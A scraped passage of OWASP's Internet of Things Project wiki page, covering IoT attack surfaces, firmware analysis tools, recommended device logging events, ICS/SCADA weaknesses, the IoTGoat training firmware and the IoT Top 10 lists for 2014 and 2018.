|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=254794OWASP Internet of Things Project2019-09-17T23:06:45Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
